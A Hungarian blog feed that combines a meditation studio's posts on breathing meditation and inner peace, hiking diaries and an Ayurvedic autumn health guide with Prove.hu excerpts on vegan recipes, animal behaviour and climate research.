Egy korábbi bejegyzésben már írtam a belső béke megtapasztalásáról. A bejegyzést itt találod. A legegyszerűbb módja, hogy a belső béke megtapasztalásába belekóstolj a légzásfigyeléses meditáció. - Ülj le csendesen egyenes háttal akár egy székre vagy a földre. - Hunyd le a szemed és irányítsd a figyelmed a légzésedre. - Tudatosítsd az orrlyukakon beáramló levegő hőmérsékletét és figyeld meg az orrlyukakon kiáramló levegő hőmérsékletét. - Figyeld meg a légzésed anélkül, hogy bármit beavatkoznál vagy minősítenél. Itt minden, amit tapasztalsz jó és nincs miért változtatni rajta. - Figyeld meg a légzésed ritmusát, a ki és belégzések hosszát - Figyeld meg a légzésed mélységét - Maradj így néhány percig. - Figyeld meg, ahogy a légzésed anélkül, hogy beavatkoznál változik, magától elcsendesedik, finomodik és lassul. - Figyeld meg ahogy elcsendesül a légzésed, az milyen hatással van a tudatállapotodra. Ha szeretnél a belső béke megtapasztalásáról többet tudni és meditációs technikákat tanulni szeretettel várunk a Meditációs és Önismereti tanfolyamra. https://www.eljharmoniaban.hu/meditacios-es-onismereti-tanfolyam Szeretettel: Kati és Purusa #meditáció #boldogság #béke #nyugalom #lelkibéke #belsőbéke #elcsendesedés #meditálás #stresszoldás #stresszkezelés
Így teheted sokkal könnyebbé a januári életmódváltást
2025. január 22. Prove - a világ vegán szemmel
Az újévi fogadalmakkal kéz a kézben járó lelkesedés január közepére már kezd kikopni, ám pár praktika bevetésével tartós lehet az életmódváltás. Fontos például, hogy ne legyél túl szigorú magaddal szemben, és találd meg az új keretek között is a bűntudatmentes, mégis kényeztető falatokat. Javában zajlik már a Veganuár kihívás, és teljesen természetes, ha teljesítés közben… The post Így teheted sokkal könnyebbé a januári életmódváltást appeared first on Prove.hu.
Az AI megmutatta: 4 módszer, amivel jelentősen csökkenthetnénk a műanyaghulladékot
2025. január 16. Prove - a világ vegán szemmel
A Kaliforniai Egyetem kutatói gépi tanulást használva előrevetítették, milyen kilátásokkal kell szembenéznünk 2050-ben, ha nem teszünk semmit a műanyaghulladék ellen. Nyolc különböző intézkedést megvizsgálva kiderítették, hogy csupán már négy alkalmazásával drasztikus mértékben csökkenthető lenne a műanyaghulladék mennyisége és az előállítással járó kibocsátás. Közben a világnak továbbra sincs egységes, műanyagra vonatkozó politikája. A klímaváltozás mellett -… The post Az AI megmutatta: 4 módszer, amivel jelentősen csökkenthetnénk a műanyaghulladékot appeared first on Prove.hu.
Belső béke
2025. január 3. Élj harmóniában
A test és elme egységet képeznek és minden, ami az elmét kibillenti az egyensúlyból, az a fizikai testben is egyensúlytalanságot hoz létre. Amikor a tudat magasabb minőségű lesz, akkor az segít az egészséges, hosszú, minőségi élet elérésében. Ilyenformán a tudat állapota, ami a legmeghatározóbb, melyet a meditációval és személyiséged fejlesztésével tudsz leginkább emelni. A feszültségektől való megszabadulás alapja a relaxáció, amellyel egy stresszmentes állapotot tapasztalhatsz meg. A relaxáció lényedet fizikálisan és mentálisan is teljesen ellazítja és ezzel előkészít a meditációra. A belső béke megteremtése ott kezdődik, amikor már megszabadultunk a feszültségektől és elkezdünk elmerülni a nyugalomban. Az érzés csodálatos, amikor úgy érzed minden rendben van, amikor elmerülsz a csendben, nyugalom, béke és teljes harmónia lesz Benned. A belső béke állapotában elcsendesednek a kavargó gondolatok, minden letisztul és értelmet nyer. Ahogy létezel a csendben, a tiszta térben, felsejlenek a megoldások, beindulnak a tested öngyógyító folyamatai. A hétköznapi életünk gyermekkorunktól tele van elvárásokkal, minősítéssel - valami jó vagy rossz, félelmet keltő, idegesítő, fekete vagy fehér, etc. Mindig, mindenről éppen gondolunk valamit. Amikor alámerülsz a belső csendben, egy új létezést tapasztalsz, a minősítés és szenvedés nélküli létet, ahol minden csak úgy van, anélkül, hogy felkavarna, bármilyen érzelmet kiváltana belőled. Megszűnik a szorongás, elcsitul a vágyak özöne, feloldódik a belső nyugtalanság és békét tapasztalsz, szétárad Benned a nyugalom. A belső elmerülés, a meditáció a kapu önvalód, spirituális lényed, a lelked megtapasztalásához. Amikor ebben a csendben időzöl, fel tudod fedezni valódi lelki természetedet, amely örökké létező, teljes tudással teli és boldog és össze tudsz kapcsolódni a Legfelsőbb forrással. Ez az összekapcsolódás a Legfelsőbbel a jóga végcélja. Emeld a tudatosságodat finomabb szintre, fejlődj emelkedj felül a hétköznapi, gondokkal, feladatokkal, minősítésekkel teli tudatszinteden. Fedezd fel azt a csendet, ami a gondolatok és szavak között van. Ez a csend mindig Veled van, amikor csak akarod, ha észreveszed. A relaxációról egy korábbi bejegyzésben olvashatsz itt. Ha szeretnél a belső béke megtapasztalásáról többet tudni és meditációs technikákat tanulni szeretettel várunk a Meditációs és Önismereti tanfolyamra. https://www.eljharmoniaban.hu/meditacios-es-onismereti-tanfolyam Szeretettel: Kati és Purusa #meditáció #boldogság #béke #nyugalom #lelkibéke #belsőbéke #elcsendesedés #meditálás #stresszoldás #stresszkezelés
,,Egy kis halat azért ehetnél - karácsonyi túlélőkalauz vegánoknak
2024. december 23. Prove - a világ vegán szemmel
A karácsony vegánként békén és szeretetteljes együttléten kívül tartogathat pár kellemetlenséget is - beszólásokat, értetlenkedést és kritikát. Érdemes lehet ezekre előre felkészülni, hogy megfelelő eszköztárral vágj bele az ünnepi családi találkozókba és esetleges faggatódzásba. A karácsonyi ünnepi időszak kevéssé ünnepi pillanatokban is gazdag a legtöbb esetben. A vegánok számára pedig végképp létszükséglet megfelelően felkészülni az… The post ,,Egy kis halat azért ehetnél - karácsonyi túlélőkalauz vegánoknak appeared first on Prove.hu.
Céklás sós gofri növényi, bazsalikomos sajtszósszal tálalva
Én nagyon szeretem a sós muffint; goffrit, palacsintát, szóval minden olyan édességet, amit sósan is lehet fogyasztani, szívesen kipróbálok. Ez egy remek GM finomság, kenyér helyett is kitűnő alternatíva. 25 dkg cékla 10 dkg répa 7 ek. barna rizsliszt 1 lenmagtojás (1 ek. lenmag + 3 ek. langyos víz 1 ek. olívaolaj 2 gerezd fokhagyma […]
Jobb híján magában ,,beszél egy magányra ítélt delfin
2024. december 9. Prove - a világ vegán szemmel
Szokatlan módon egyedül él Delle, a palackorrú delfin a Balti-tengerben, ettől függetlenül annyi hangot ad ki, mintha legalább két társa lenne még mellette. A kutatók szerint ez valószínűleg arról árulkodik, hogy hiányzik neki a társaság, egyértelmű magyarázatot azonban egyelőre nem találtak az állat viselkedésére. A palackorrú delfinekről köztudott, hogy társaságkedvelő állatok, közösségekben élnek, amelyek akár… The post Jobb híján magában ,,beszél egy magányra ítélt delfin appeared first on Prove.hu.
Több lövést is kapott Vivy, az orangután, de újra teljes életet élhet
2024. december 7. Prove - a világ vegán szemmel
A nyakában és a lábában is volt golyó Vivynek, mikor megtalálták. A sérült orangután azonban felépült, és vissza is térhetett a vadonba. Sok fajtársa viszont nem éli túl az ültetvényesben tett látogatást, az orangutánokat Szumátrában és Borneóban a gazdák többsége kártevőként tartja számon. Visszajutott a dzsungelbe Vivy, egy borneói orangután, miután gondozói és orvosai úgy… The post Több lövést is kapott Vivy, az orangután, de újra teljes életet élhet appeared first on Prove.hu.
Ma már nem nagy mutatvány a vegán mikuláscsomag összeállítása
2024. december 4. Prove - a világ vegán szemmel
Feltérképeztük, milyen vegán csokimikulás és egyéb növényi alapú édesség érhető el a piacon. Nem érdemes azonban megfeledkezni az egészséges - akár házilag készített - nassolnivalókról sem, ezeknek is van helyük a csomagban. Hagyományosan a mikuláscsomag mogyorót, gyümölcsöt, aszalványokat és édességeket, rossz esetben virgácsot is tartalmaz. Idővel azonban részben átalakult - a Mikulás ábrázolásmódjával együtt az… The post Ma már nem nagy mutatvány a vegán mikuláscsomag összeállítása appeared first on Prove.hu.
Finomság Neked: a Naked Noble
Itt a tél, amikor talán - nemcsak az ünnepek, hanem az otthonainkban töltött idő növekedése miatt is - többet sütögetünk, sósat, édeset is egyaránt. Én igyekszem törekedni arra, hogy a hozzáadott cukrot mellőzzem sütéseim alkalmával és tartalmas, egészséges édességeket készítsünk (a gyerekekkel együtt) csemegeként. Ilyentájt mindig megnő a megkeresések száma: számos üzenetet kapok tőletek egyrészt […]
A kutyákat is megviselheti a családtagok közötti veszekedés
2024. november 27. Prove - a világ vegán szemmel
Akárcsak a gyermek, a kutya is stresszhelyzetként élheti meg a családtagok közötti heves vitákat. Kutatók egy csoportja megfigyelte, hogyan reagálnak a négylábú családtagok a gazdik között kitört szócsatákra. Kiderült, hogy a legtöbb kutya a vita végeztével a vesztes féllel tölt el több időt, amit a kutatók evolúciós okokra vezettek vissza. Nemcsak a szomszédok lehetnek passzív… The post A kutyákat is megviselheti a családtagok közötti veszekedés appeared first on Prove.hu.
Tökéletes lilahagymalekvár: mindössze 5 összetevőből áll
2024. november 20. Prove - a világ vegán szemmel
A lilahagymalekvár harmonikusan ötvözi az édes, sós és savanykás ízeket. Tökéletes kísérője lehet vegán sajtoknak, sülteknek vagy akár egy szelet friss kenyérnek is. A lilahagymalekvár elkészítéséhez mindössze öt, hétköznapi hozzávalóra van szükséged, amit bármilyen boltban könnyedén megtalálhatsz. Ráadásul az elkészítése is egyszerű, csupán egy titka van: a türelem. A tökéletes karamellizációhoz ugyanis idő kell, és… The post Tökéletes lilahagymalekvár: mindössze 5 összetevőből áll appeared first on Prove.hu.
Csehek mószerolták be a medvékre vadászó Szlovákiát
2024. november 17. Prove - a világ vegán szemmel
Hivatalos uniós panaszt tett Szlovákiával szemben egy cseh állatkert, miután a szomszédos országban a medvék kilövése immár ,,problémás viselkedés vagy támadás nélkül is megtörténhet. Ez márpedig ellentétes az Európai Unió jogrendszerével. Az Európai Bizottságnak most döntenie kell majd arról, indítson-e eljárást Szlovákiával szemben, indokolt-e a cseh kritika. Románia után Szlovákiában is fellángolt a medvevita. A… The post Csehek mószerolták be a medvékre vadászó Szlovákiát appeared first on Prove.hu.
Édes élet a Vital-Sweet-tel
Az elmúlt évek során számos kérdést kapok tőletek az édesítés témakörében: én mit használok kristálycukor helyett a mindennapokban; illetve most aktuális kérdés, hogy a karácsonyi süteményeket mivel édesíthetitek. Az egykori inzulinrezisztenciám, illetve a gyerekek egészsége miatt is fokozottabban odafigyelek arra, hogy mivel édesítsem meg, no nem csak a hétköznapokat, hanem az ételeinket, desszertjeinket is. […]
Halloweeni muffin sütőtökkel és csokoládédarabokkal
2024. október 29. Prove - a világ vegán szemmel
Ha híján vagy a kísérteties ünnepi desszertötleteknek, akkor ez a halloweeni muffin pont neked való. Ezt a sütőtökös, fűszeres, kevert tésztás édességet akár a gyerekeket bevonva is elkészítheted, és a kreativitásodat szabadon engedve, kedved szerint dekorálhatod is. A muffin az egyik legegyszerűbben elkészíthető sütemény: csak össze kell keverni a hozzávalókat egy tálban, muffinformákba tölteni, majd… The post Halloweeni muffin sütőtökkel és csokoládédarabokkal appeared first on Prove.hu.
Őszi receptek: 7 étel, amivel hangulatosabban telnek az esős napok
2024. október 25. Prove - a világ vegán szemmel
Az őszi hónapokban van valami különleges varázsa annak, ahogy az idő lassan hűvösre fordul, és ilyenkor mindannyian kicsit jobban vágyunk arra a kuckós, otthonos érzésre. Ebben az időszakban jobban esik a konyhában lenni és valami melengető finomságot készíteni. Ez a hét recept segíthet az őszi hangulat megteremtésében, legyen szó édes finomságokról, őszi vitaminbombákról vagy melegítő… The post Őszi receptek: 7 étel, amivel hangulatosabban telnek az esős napok appeared first on Prove.hu.
Teve - szikla könnyű túra
2024. október 23. Élj harmóniában
A csodaszép őszi erdőknél a tegnapi hatalmas aranyló bükkösöket, ma kellemes, napsütötte tölgyesre váltottam Ez egy könnyed délutáni túra, komolyabb szintemelkedések nélkül. A Teve szikla nekem mindig izgalmas, varázslatos jelenség, a maga egyedi és napsütötte környezetével. Gyerekekkel szerintem igazán különleges élmény lehet. Nekem az volt most szokatlan, hogy nem mentünk fel a Nagy-Kevély tetejére, mert ilyen kis rövid egyszerű túrát nem igazán szoktunk tenni:) Mai útvonal: Pilisborosjenő - Köves-bérc - Teve-szikla - Pilisborosjenő szeretettel Kati #túra #kirándulás #teveszikla #pilisborosjenő #kövesbérc #éljharmóniában
Teljes értékű, gluténmentes sütőtökös muffin: így használd fel a maradék sütőtököt
2024. október 12. Prove - a világ vegán szemmel
Az őszi hangulat sztárja kétségkívül a sütőtök: ebben az időszakban szinte nincs olyan étel, legyen az sós vagy édes, amibe ne kerülhetne bele összetevőként. Ilyen ez a sütőtökös muffin is, amivel könnyedén őszi hangulatot csempészhetsz a konyhádba. Ez a sütőtökös muffin amellett, hogy mennyei, még a teljes értékű növényi étrendbe is illeszthető, valamint gluténérzékenyek is… The post Teljes értékű, gluténmentes sütőtökös muffin: így használd fel a maradék sütőtököt appeared first on Prove.hu.
Egészségmegőrzés októberben - aktualitások
2024. október 6. Élj harmóniában
Az október hónap nagy változásokat hoz.... Megérkezett az ősz a Vata időszak. Látványosan korán sötétedik, egyre rövidebbek a nappalok és egyre tovább tart a sötét órák száma. Jóval hidegebbre vált az időjárás... még ha a nappali hőmérséklet
20 fok fölött is van a reggelek és esték már nagyon hűvösek. A szeles idő pedig
kiszárítja a természeteben a faleveleket. A természetben megfigyelheted, hogy az
egységes zép zöld tájak, egyre színesebbé válnak - zöldek, sárgák, barnák,
okkerek, vörösek, lilás árnyalatok, majd az elszínesedett levelet lehullanak. Elkezdenek
a fák megkopaszodni, leteszik szép színes ruháikat és visszavonulnak. Ez az
időszak az elcsendesedésről, visszavonulásról szó.
A lehülés legrosszabbul
a Vata-kat érinti, mert ők amúgy is hajlamosak szárazságra. A Pittáknak azonban
ez a megváltás időszaka. Le tudnak hűlni, nyugodtabb less az elméjük, míg
nyáron alig tudtak mozogni, most több az energiájuk és szívesen mennek sétálni,
kirándulni.
Októberben a Te szervezetedben is fokozódik a hidegérzet és
a szárazság. A vér a test belsejébe áramlik, hogy tudjon melegíteni így
tapasztalhatsz hidegebb lábakat, kezeket és sápadtságot és mivel a gyomor
vérellátása fokozódik megnőhet az étvágyad. Sokkal jobban kívánod a tartalmas
ételeket, mert a téli védekező zsírréteget építi fel a szervezeted. Ez a
szigetelő réteg biztosítja télen az immunitásod alapját, hogy ne fázz meg
egykönnyen. Azonban érdemes odafigyelni, főleg a kapháknak, hogy ne csapjon át
a téli üzemmód előkészítése túlzott evésbe, nassolásba, hízókúrába.
Tapasztalhatod, hogy szárazabb a bőröd, kiszárad a szád, a
torkod, lehet, hogy szárazság lesz a belekben - ami gázosodásra, puffadásra,
székrekedésre hajlamosít. akár úgy érezheted többet kell menned pisilni. Vata
alkatúaknál előfordulhat álmatlanság, szorongás, idegesség.
Ebbe a nagy, nagy változásokkal teli környezetben a szervezetednek
ilyenkor földelésre, stabilizálásra és hidratálásra, nedvesítésre, olajozásra van
szüksége.
Próbálj búcsút inteni a sok programnak, utazgatásnak. A sok
környezeti, évszaki változás amúgy is megviseli a szervezeted, a stabilitásod,
belső kiegyensúlyozottságod megőrzése érdekében részesítsd előnyben az otthoni
bekuckózást, pihenést, családdal való együttlétet, sütögetést, főzést, közös
étkezéseket, olvasást, filmnézést. A túl sok rohangálás, stimuláló program, most
nem ideális. Fókuszban az elcsendesedés, a visszavonulás: legyen.
Azoktóber nagy változást hoz az öltözködésben is. Öltözz
rétegesen, melegen. Vedd elő a kabátot, sapkát, kesztyűt, vastagharisnyát,
meleg pulóvert mellényt, csizmát. A lábadat is tartsd melegen, használj
gyapjúzoknit, papucsot és az utcára melegcipőt. A bekuckózáshoz, otthoni melegen
tartáshoz vegyél elő vastagabb otthoni ruhákat, meleg plédeket, lábmelegítőt,
melegvizes palackot.
Legyen egy jó napi rutinod
Próbálj rendszerességet vinni az életedbe, ugyanazon időben
kelj és feküdj le, reggelizz, ebédelj, vacsorázz. Ez már jó alapokat biztosít
ahhoz, hogy stabilabb, összeszedettebb legyél.
Reggel aludj nyugodtan kicsit tovább, mint nyáron, de azért
7 óráig kellj fel mindenképpen. Este próbálj lefeküdni 22:00-ig. A szervezeted
számára az egyik legfontosabb, hogy vissza tudjon töltődni, regenerálódjon és ezek
a folyamatok a szervezetedben 22:00-kor indulnak el. A késő lefekvés mentálisan
és fizikálisan is meg fog viselni, gyengíti az idegrendszert és az immunrendszert,
depire hajlamosabbá tesz, rontja az emésztésed hatékonyságát, csökkenti az
energiaszinted, rontja a hormonrendszered állapotát, etc..
Végezz reggel olajos önmasszázst zuhanyozás előtt. Ez nem
csak a bőrödet segít rugalmasan tartani és védeni a hidegtől, de jótékony az
idegrendszeredre, hormonrendszeredre, emésztésedre is.
Táplálkozás
A stabilizálást a táplálkozással tudod legjobban megalapozni,
így az őszi étkezéseidet földelő, stabilizáló és tápláló ételekből javasolt összeállítani.
Lévén már a szabadban egyre kevesebb időt tudunk tölteni, itt az ideje a sütőt
begyújtani, izzítani a főzőlapokat és otthon finomakat sütni, főzni.
Köszönj el a nyáron fogyasztott könnyű ételektől - saláták,
szendvicsek, hideg ételek, italok, uborka, padlizsán, paradicsom, paprika, grillezett
ételek ,etc. majd jövő nyáron újra
visszavezetheted őket.
Most a fókusz a hideg és a szárazság ellensúlyozásán van, a
téli immunitás megalapozásán. Főzz, egyél meleg ételeket és igyál meleg
italokat. Élvezd az ősz adta ételeket sárgarépa, sütőtök, cékla, dió,
gesztenye, meleg levesek, meleg gabonák, hüvelyesek, raguk, főzelékek. édességek,
kásák. Ez most a zsírosabb, tápláló, tartalmas, nehezebb ételek időszaka.
Elsődlegesen az édes, sós izek sokat tudnak segíteni
ellensúlyozni az őszi száraz időjárást. Egy kevés savanyú íz is jól jöhet ilyenkor
- pl savanyú alma párolva, kis lime vagy citromlé.
Az édességek kifejezetten ideálisak ebben a szárazságot
hozó időszakban. Az édes íz földel, stabilizál, táplál, nyugtatja az idegrendszer,
felépíti a testszöveteket, javítja a kedélyállapotodat. Édes ízű dolgok, nem a
fehércukrot jelentik. A rizs, a tej, tejszín, datolya, párolt alma, édesburgonya,
sütőtök, kókusztej, mandula, etc. azaz minden ami édes ízt képviseli jó most. Szóval
bátrabban az édes ízzel, mert ez most testileg és lelkileg is kedvező.
Az egyik legjobb a szárazság ellen, hogy vigyél be a
szervezetedbe több zsiradékot. Csorgass ghít (tisztított vajat az ételedre) vagy
önts hozzá olívaolajat vagy egy kis szezámolajat.
Részesítsd előnyben a meleg ételeket, már reggelire is
érdemes meleget fogyasztani - a kásák ideálisak ilyen célra (zabkása, quinoa
kása, rizskása, etc.) tehetsz hozzá dióféléket, aszalt gyümölcsöket. és persze tegyél hozzá zsiradékot is pl. ghí. Ha gyengült az emésztésed,
étkézés előtt fogyassz egy kis da rabka gyömbért egy kis sóval és egy kis
limelével
Használj kis mennyiségben
melegítő fűszereket (fahéj, gyömbér, feketebors, cardamom, kakukkfű, kurkuma),
de nem vidd túlzásba, és kerüld a nagyon szárítóakat, mint chili, cayannebors. A
túl sok csípős
Igyál meleg folyadékot, gyógyteákat, forralt vízet. Igyál édesgyökér teát vagy ha nagyon száraznak érzed magad fogyaszthatsz egy kis édesgyökér port is. Az édesgyökér kiváló a tested nedvesen tartására.
Tarts szem előtt, hogy
októberben nem csak a természetben vannak
nagy átalakulások, de a testedben és az elmédben is. Próbálj alkalmazkodni a
megváltozott körülményekhez, mert így tudod minimalizálni az időszak okozta
kellemetlen fizikális és mentális hatásokat. A stabil napirend, a tápláló, meleg
ételek fogyasztása, a lecsendesedés, lelassulás, az otthoni pihenés és a melegen
tartás segítenek komfortossá tenni az őszi változásokat. Kellemes októberi napokat kívánok :) szeretettel Kati #ájurvéda #október #egészségmegőrzés #ősz #vata #kiegyensúlyozottság
Aszalt szilvás gombafasírt glutén- és olajmentes változatban (TÉNÉ)
2024. október 5. Prove - a világ vegán szemmel
Készen állsz egy igazi hangulatos őszi receptre? Ez az aszalt szilvás gombafasírt amellett, hogy mennyei és esztétikus, még a teljes értékű növényi étrendbe is beleilleszthető. Ennek a fasírtnak az alapja a zabpehely, a gomba, a lencse és az édesburgonya. Nem tartalmaz hozzáadott olajat, mégis isteni a végeredmény, úgyhogy mindenképp érdemes kipróbálnod. Csakúgy, mint a hagyományos… The post Aszalt szilvás gombafasírt glutén- és olajmentes változatban (TÉNÉ) appeared first on Prove.hu.
Ajándék idő
2024. szeptember 29. Élj harmóniában
"Ajándék idő" Drága Édesanyám mondta sokszor, amikor az évszak nem kedvezett a jó, kellemes időjárásnak, de mégis volt egy egy szép, napsütéses nap.... ma is egy ilyen szép, őszi napsütéses napunk volt, amolyan ajéndék idő :))) Csodás napsütés. a szél által keltett hullámok a tavakon, a kék ég izgalmas felhőkkel, és annak ellenére, hogy megkezdődött az őszülés, még mindig a táj nagyrésze zöld. MIvel egyre korábban megy le a nap, rövidülnek a nappalok, így egyre rövidebbre kell terveznem a túrákat is. Illetve ma a késői indulás miatt, kicsit bele is kellett húzni, hogy még világosban leérjük a hegyről. Imádom ezt az útvonalat és amikor nincs sok időnk, akkor is szerencsés választás mert otthonról tudunk indulni és nem kell hozzá tömegközlekedni. 13 órakor indultunk és a közel 19 km-es távot, 610 m szintemelkedéssel, nézelődéssel, sütkérezéssel, vacsorázással együtt végül 5,5 óra alatt tettük meg. Ha tervezel az útvonalon végigmenni, akkor ennél azért több időt szánj rá:) Erőnlét vagy idő hiányában rövidíthetsz is - Csillaghegyről tehetsz egy túrát csak a Róka- hegyre, vagy elmehetsz a Nagy Kevélyre. Illetve ha autóval érkezel, a túrát indíthatod a Kevélyek lábától a Budakalászi út és a Békahát utca kereszteződésétől is. Mai útvonal: Csillaghegy- Róka-hegy - Ezüstkevély - Nagy- Kevély - Kis - Kevély - Nagy-Kevély - Csillaghegy Napsütéses erdei sétákat kívánok:) szeretettel Kati #túra #kirándulás #pilis #edőjárás #kiskevély #nagykevély #ősz
Rugalmasság a túratervezésben is
2024. szeptember 24. Élj harmóniában
Lehet, hogy Neked van egy terved, de Istennek is van egy terve... amikor a kettő nem egyezik, úgyis az ő terve érvényesül Az élet a legtöbb embernek szűntelen stressz, mert eltervez valamit és utána bosszankodás, amikor a dolgok nem a tervek szerint alakulnak. A fiatalság megőrzésének titka és persze az életbenmaradásé is a rugalmasság. Amikor vihar van a fák hajlonganak, amelyik nem hajlik az törik... Ilyen az élet is, akkor tudjuk jól működtetni az életünket és viszonylag stresszmentesen, ha tudunk rugalmasan alkalmazkodni a körülményekhez. Én nem szeretek komplett terveket kovácsolni, mert tudom az élet fogja alakítani. Semmi nincs kőbe vésve.. ha jól rémlik a sztori, amik kőbe voltak vésve, azok is összetörtek... Szerencsés helyzet a túrázásnál, hogy nincs autónk, mert szabadon tudunk bármerre kalandozni túra közben - nem kell visszatérni a kiindulási pontra. Mindig van a fejemben egy alapkoncepció, de nincs kőbe vésve, nincs végleges útvonal, mert menet közben alakítjuk. Mindig van valami, ami miatt alakítjuk a kezdeti koncepciót:) Imádom ezt a fajta szabadságot. Ma ilyen volt az időjárás ... volt 3-4 féle koncepció a fejemben, hogy kedvünk szerint tudjunk variálni, de végül egy ötödik útvonalon teljesült:) Csodás napsütéses időben indultunk, majd a túra alatt folyamatosan kellett öltözködni, ahogy a nap elbújt vagy éppen kikukucskált a felhők közül vagy éppen amikor esni kezdett és hideg szél fújt, Amikor elkezdett esni az eső, visszafordultunk és szerencsére vissza tudtunk érni a Sasfészekbe (ez egy kulcsosház a Fekete-hegyen) . A Sasfészek panorámás teraszán kényelmesen átvészelhettünk az esőt - szerencsére nem volt vihar, csak eső. Az esős időjárás, a nyári túracipőm nedvesedése, az 1 órás kiesés bevallom nekem kicsit kedvemet is szegte a betervezett barlang nézegetéstől. Így lerövidítve az útvonalat hazafelé vettük az irányt:) Mai útvonalunk: Kesztölc- Kétágú-hegy - Öreg szirt - - Fekete-hegy Sasfészek - Pilis-nyereg - Két-bükkfa-nyereg Csodás túrákat kívánok:) szeretettel Kati
Műanyagszeméten utazó invazív fajok veszélyeztetik az Antarktisz élővilágát
2024. szeptember 22. Prove - a világ vegán szemmel
Korábban a jég védte az Antarktisz sérülékeny élővilágát a betolakodóktól, a klímaváltozás és a jég olvadása azonban az idegen fajok megtelepedését segíti - derül ki egy friss tanulmányból. Az antarktiszi ökoszisztémák pedig nincsenek hozzászokva az invazív fajokkal való küzdelemhez. Az Antarktisz kapcsán a leggyakrabban a jég egyre gyorsuló olvadásáról szólnak a hírek. Arról, hogy visszafordíthatatlan-e a… The post Műanyagszeméten utazó invazív fajok veszélyeztetik az Antarktisz élővilágát appeared first on Prove.hu.
Krémes édesburgonya curry: a csicseriborsótól lesz igazán laktató
2024. szeptember 12. Prove - a világ vegán szemmel
Ez az édesburgonya curry egy igazán sokoldalú és egyszerűen elkészíthető étel, amely a dél-ázsiai ízek világát hozza el a konyhádba. Kiváló választás egy hétköznapi vacsorához, hiszen gyorsan elkészíthető, és gazdag ízvilágának köszönhetően másnap, újramelegítve is ugyanolyan finom marad. A lágy kókusztej és a fűszerek harmonikus kombinációja tökéletesen egészíti ki az édesburgonya természetes édességét, így egy… The post Krémes édesburgonya curry: a csicseriborsótól lesz igazán laktató appeared first on Prove.hu.
A legtöbb klímavédelmi intézkedés nem éri el a kívánt hatást
2024. szeptember 11. Prove - a világ vegán szemmel
Másfélezer klímavédelmi intézkedést megvizsgálva az elmúlt negyed évszázadból, kutatók egy csoportja arra jutott, hogy csak nagyon kis részük ért el jelentős kibocsátáscsökkenést. A tanulmányból kiderül, hogy nincs egyetlen jól használható minta, ami minden szektorban megfelelően működhetne. A legtöbb intézkedés pedig túl specifikus ahhoz, hogy eredményt érjen el. Szinte alig van olyan klímavédelmi intézkedés az elmúlt… The post A legtöbb klímavédelmi intézkedés nem éri el a kívánt hatást appeared first on Prove.hu.
Grapefruitméretű jégdarabokra számíthatunk a közeljövőben
2024. szeptember 6. Prove - a világ vegán szemmel
A jövőben akár grapefruitméretű jégdarabokra is lehet számítani a heves jégesők kapcsán. Ez a jelenség is az egyre melegedő éghajlat egyik következménye. Leginkább az Egyesült Államok keleti részén lehet tartani a nagy méretű jégdaraboktól. A klímaváltozás következményeit legtöbbször a hőmérséklet emelkedésével szoktuk összefüggésbe hozni. Kevesek számára meglepő, hogy az egyik ilyen lehetséges következmény az egyes… The post Grapefruitméretű jégdarabokra számíthatunk a közeljövőben appeared first on Prove.hu.
Az alternatív fehérjeforrások elterjedésével hatalmas terület szabadulna fel az Egyesült Államokban
2024. szeptember 1. Prove - a világ vegán szemmel
A Good Food Institute friss elemzése alapján hatalmas terület lenne felszabadítható, ha az állati eredetű élelmiszerek felét alternatív fehérjeforrásokra cserélnék az amerikaiak, mivel az állattartó mezőgazdálkodással nyert kalóriák arányaiban sokkal több földterületet használnak, mint a növényi alapú húshelyettesítők. A kutatók szerint ez a lépés segítene elérni az ország által kitűzött klímacélokat is. A bolygó mezőgazdasági… The post Az alternatív fehérjeforrások elterjedésével hatalmas terület szabadulna fel az Egyesült Államokban appeared first on Prove.hu.
Fügés-pekándiós töltött tök
2024. augusztus 22. Vegán receptek Tőlünk Nektek
Annátólkaptuk ezt a különleges receptet, két változatban.
A.
Töltelék: 2 kis fej hagymát olajon , kurkumával, kis levesporral, római köménnyel, picit szerecsendióval megdínszteltem. A tök belsejét gömbölyű gyümölcsvájóval kiszedtem, a gömböket kicsit apróbbra vágtam, majd ráborítottam a hagymára. 3-4 szem érett füge belsejét belekanalaztam. Összeforgattam. Levet engedett, hagytam párolódni. Aprószemű zabpelyhet szórtam bele, pépesedett, krémesedett, a végén kicsi zab-főzőtejszínnel lágyítottam.
A tökhajót fokhagymás olajjal kikentem. Beletöltöttem a tökbe. Sütőben 180 fokon sült, lefedtem eleinte (átszurkált sütőfóliával) , alátettem egy lábast vízzel, hogy párologjon a sütőben. A végére levettem. Petrezselyemmel megszórtam, pekándióval díszítettem.
B.
Lehet ugyanez korianderrel és gránátalma magokkal ( ezt akartam, csak nem kaptam gránátalmát). Reszelhetünk rá növényi sajtot is.
Ha valakinek van kedve: pekándiót mézzel megcsurgatsz, kisütöd a sütőben- nagyon finom, azt is lehetne a tetejére tenni, illene.
Köret: a quinoát megmossuk, sóval megfőzzük. Az édesburgonyát külön kockára vágva szintén kifőzzük. A végén összeborítjuk.
A salátához dresszing: 1 kiskanál mustár, méz, citrom, főzőtejszín, repceolaj.
A salátába mangót aprítottam, lehet rá reszelt sajtot is, szárított kenyérkockát és összekutyulod. Mehet bele mindenféle vékonyra vágott paprika.
Mennyei! :)
A növényi étrend lassíthatja az öregedést a legújabb ikerkísérlet szerint
2024. augusztus 22. Prove - a világ vegán szemmel
Mindössze nyolc hét elegendő ahhoz, hogy az egészséges növényi étrend fiatalító hatásai mérhetők legyenek a szervezetben. A biológiai életkort meghatározó markerek mérésével a kutatók megállapították, hogy az ikerpárok növényi étrendet követő tagjaiban lelassult az öregedés folyamata. Nem ez az első ikerkísérlet, amely a növényi étrend előnyeit bizonyította. Mindenki annyi idős, amennyinek érzi magát - legalábbis… The post A növényi étrend lassíthatja az öregedést a legújabb ikerkísérlet szerint appeared first on Prove.hu.
Egyre kevesebb társas kapcsolatot tartanak fenn az állatok, ahogy öregszenek
2024. augusztus 19. Prove - a világ vegán szemmel
Szarvasoknál, birkáknál és makákóknál is megfigyelték, hogy koruk előrehaladtával egyre kevesebb társas kapcsolatot tartanak fent. A hosszú ideje tartó kutatások lehetőséget nyújtanak arra, hogy pontos képet kapjunk az egyes állatok társasági viselkedéséről. Ám az idősödő állatok szokásaiban bekövetkező változások okai továbbra sem teljesen tiszták a kutatók számára. Elképzelhető, hogy egyfajta önvédelmi mechanizmusról van szó. Úgy… The post Egyre kevesebb társas kapcsolatot tartanak fenn az állatok, ahogy öregszenek appeared first on Prove.hu.
A macskák is gyászolják az elpusztult társállatokat
2024. augusztus 17. Prove - a világ vegán szemmel
